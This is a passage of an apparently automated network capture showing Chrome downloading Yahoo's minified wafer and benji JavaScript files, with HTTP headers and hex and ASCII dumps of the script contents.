                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6f 2e 72 65 6d 6f 76 65 4d 6f 64 75 6c 65 28 6c 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 74 72 61 63 6b 65 64 22 29 2c 21 30 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 2c 69 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 22 2e 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 3a 69 2c 6c 3d 65 2e 76 61 6c 69 64 61 74 65 44 65 6c 61 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o.removeModule(l),e.classList.remove("wafer-rapid-tracked"),!0},H=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},r=e.root,n=void 0===r?document:r,i=e.selector,a=void 0===i?".wafer-rapid-module":i,l=e.validateDelay
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 69 66 28 52 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 73 79 6e 63 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 46 28 65 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 71 28 6e 2c 72 29 3b 76 61 72 20 69 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 29 3b 69 2e 6c 65 6e 67 74 68 3e 30 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: if(R(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"sync",this).call(this,e),e){var r=this._state.elementInstances,n=F(e);if(n)return void q(n,r);var i=N(e.getElementsByClassName("wafer-rapid-module"));i.length>0&&Array.prototype.forEach.call(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC977INData Raw: 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2c 6e 3d 72 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 69 3d 72 2e 65 6c 65 6d 65 6e 74 57 69 74 68 49 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 65 64 49 6e 73 74 61 6e 63 65 73 3b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 26 26 7a 28 65 2c 6e 2c 69 29 3b 76 61 72 20 61 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 2c 6e 29 29 3b 61 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t.getPrototypeOf(t.prototype),"destroy",this).call(this);var r=this._state,n=r.elementInstances,i=r.elementWithIntentionalViewedInstances;e.classList.contains("wafer-rapid-module")&&z(e,n,i);var a=N(e.getElementsByClassName("wafer-rapid-module",n));a.leng


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    99192.168.2.44986387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC539OUTGET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC710INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 3VOunSA86Cz8GIIBzf2hzpfmqYrjPNfgyQDj+lmxRncxOcDbsFFEWMTnJCVhZzrVFqA3gqS0IEZ+i+a7ydkHCN9ZLIr5yfwn1yJ2TjPy0V4=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: Y8TYYCDKS5VHN32H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 23 Sep 2024 07:02:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 13 Feb 2023 05:31:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "397b59e3eeca4f747ea1f6ff6323154c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: tENZ6Ri2vrrjg96D4AX.qx653XeJQH2M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 641942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),u=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 70 65 72 63 65 6e 74 61 67 65 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 6d 3d 66 28 77 2c 32 29 2c 6b 3d 6d 5b 30 5d 2c 54 3d 6d 5b 31 5d 2c 6a 3d 6b 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 6b 2c 31 30 29 29 2c 30 29 3a 35 30 2c 43 3d 54 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 54 2c 31 30 29 29 2c 30 29 3a 35 30 2c 50 3d 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 63 75 6d 75 6c 61 74 69 76 65 22 29 2c 41 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4f 2b 22 62 65 61 63 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6c 61 73 73 22 29 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ttribute(O+"trigger-percentage")||"").split(" "),m=f(w,2),k=m[0],T=m[1],j=k?Math.max(Math.min(100,parseInt(k,10)),0):50,C=T?Math.max(Math.min(100,parseInt(T,10)),0):50,P=e.hasAttribute(O+"trigger-cumulative"),A=e.getAttribute(O+"beacon-container-class")||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6f 66 66 73 65 74 59 2c 70 3d 69 2e 73 65 6c 65 63 74 6f 72 2c 79 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 63 2d 75 29 3b 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 2d 69 6e 2d 70 72 6f 67 72 65 73 73 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 28 66 7c 7c 21 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 26 26 28 30 3d 3d 3d 79 7c 7c 21 31 3d 3d 3d 6e 7c 7c 64 2e 69 73 50 61 67 65 56 69 73 69 62 6c 65 26 26 77 28 6f 2c 6c 28 7b 7d 2c 69 2c 7b 6f 66 66 73 65 74 58 3a 68 2c 6f 66 66 73 65 74 59 3a 76 7d 29 2c 64 2e 76 69 65 77 70 6f 72 74 29 29 29 72 65 74 75 72 6e 20 61 26 26 61 2e 73 70 6c 69 74 28 22 7c 22 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: offsetY,p=i.selector,y=Math.max(0,c-u);o.classList.add("wafer-beacon-in-progress"),setTimeout(function(){if((f||!o.classList.contains(s))&&(0===y||!1===n||d.isPageVisible&&w(o,l({},i,{offsetX:h,offsetY:v}),d.viewport)))return a&&a.split("|").forEach(funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6e 63 74 69 6f 6e 28 72 29 7b 72 26 26 22 6d 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 74 26 26 65 2e 64 65 73 74 72 6f 79 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 59 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 7c 7c 65 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 58 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nction(r){r&&"mouseenter"===t&&e.destroy()})}},{key:"offsetY",set:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;this._util.offsetY=this._util.offsetY||e}},{key:"offsetX",set:function(){var e=arguments.length>0&&void 0!==argumen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 41 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2c 45 3d 41 2e 62 69 6e 64 45 76 65 6e 74 2c 78 3d 41 2e 65 61 63 68 2c 53 3d 41 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 2c 58 3d 41 2e 74 68 72 6f 74 74 6c 65 2c 59 3d 41 2e 75 6e 62 69 6e 64 45 76 65 6e 74 2c 49 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 4c 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ritable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),A=window.wafer.utils,E=A.bindEvent,x=A.each,S=A.elementInView,X=A.throttle,Y=A.unbindEvent,I=window.wafer.base,L=window.wafer.controllers.Wafer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 6d 61 70 4f 66 66 73 65 74 28 29 2c 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 44 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3b 74 26 26 78 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 59 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 65 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 64 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "handleResize",value:function(){this._mapOffset(),this._validateWithThrottle()}},{key:"willDestroy",value:function(){var e=this,t=this._options.container;t&&x(t,function(t){Y(t,"scroll",e._validateWithThrottle)})}},{key:"didSync",value:function(){var e=th
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC237INData Raw: 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2a 70 2f 31 30 30 2c 31 30 29 29 2c 21 76 26 26 28 6c 2e 69 6e 73 74 61 6e 63 65 2e 6f 66 66 73 65 74 58 3d 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 57 69 64 74 68 2a 64 2f 31 30 30 2c 31 30 29 29 7d 7d 63 61 74 63 68 28 65 29 7b 72 3d 21 30 2c 6e 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 74 26 26 6f 2e 72 65 74 75 72 6e 26 26 6f 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f 77 20 6e 7d 7d 7d 7d 5d 29 2c 74 7d 28 4c 29 2c 42 3d 56 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 42 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: -parseInt(c.clientHeight*p/100,10)),!v&&(l.instance.offsetX=-parseInt(c.clientWidth*d/100,10))}}catch(e){r=!0,n=e}finally{try{!t&&o.return&&o.return()}finally{if(r)throw n}}}}]),t}(L),B=V;t.default=new B({selector:".wafer-beacon"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    100192.168.2.44986287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC360OUTGET /aaq/benji/benji-2.1.123.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: VD84HRHkBeNimszVucgR1gSzOgjXM30S1NqsdPj6EhYCcQiUlrNj7qFW48O6xMgrKlmdRqeIHNQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: JM1QQD03DAPEY4T9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 23 Sep 2024 12:57:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Sep 2024 21:31:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "66b2b6a7e55444cdb9d1f4906bc9e6d1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: RyskklpfTINJYOWq9gsSQpDwOWWSaT7k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 87389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 620633
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 7b 61 73 73 65 72 74 69 76 65 3a 7b 7d 2c 62 65 6e 6a 69 3a 7b 7d 2c 67 6f 6f 67 6c 65 74 61 67 3a 7b 63 6d 64 3a 5b 5d 7d 2c 70 62 6a 73 3a 7b 71 75 65 3a 5b 5d 7d 2c 59 41 48 4f 4f 3a 7b 7d 7d 3b 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 3d 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 7c 7c 28 65 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 65 2e 6d 61 70 28 28 65 3d 3e 65 2e 74 68 65 6e 28 28 65 3d 3e 28 7b 73 74 61 74 75 73 3a 22 66 75 6c 66 69 6c 6c 65 64 22 2c 76 61 6c 75 65 3a 65 7d 29 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 28 7b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 31 33 33 31 2c 49 6e 66 69 6e 69 74 79 22 3a 5b 31 36 2c 33 5d 2c 22 34 38 31 2c 31 33 33 30 22 3a 5b 34 30 2c 39 5d 7d 2c 73 69 7a 65 3a 5b 33 2c 31 5d 7d 2c 4c 69 67 68 74 68 6f 75 73 65 3a 7b 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 22 30 2c 49 6e 66 69 6e 69 74 79 22 3a 5b 39 2c 31 36 5d 7d 2c 73 69 7a 65 3a 5b 32 2c 32 5d 7d 2c 53 6d 61 72 74 41 73 73 65 74 57 69 64 67 65 74 4c 61 72 67 65 3a 7b 73 69 7a 65 3a 5b 38 30 30 2c 36 33 35 5d 7d 2c 53 70 6f 74 6c 69 67 68 74 3a 7b 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 22 30 2c 34 38 30 22 3a 5b 38 2c 39 5d 7d 2c 73 69 7a 65 3a 5b 33 2c 32 5d 7d 2c 54 72 61 64 65 4e 6f 77 3a 7b 73 69 7a 65 3a 5b 32 38 30 2c 35 35 5d 7d 7d 2c 6b 3d 7b 22 5b 31 34 34 30 2c 31 30 32 34 5d 22 3a 22 4c 6f 67 69 6e 22 2c 22 5b 32
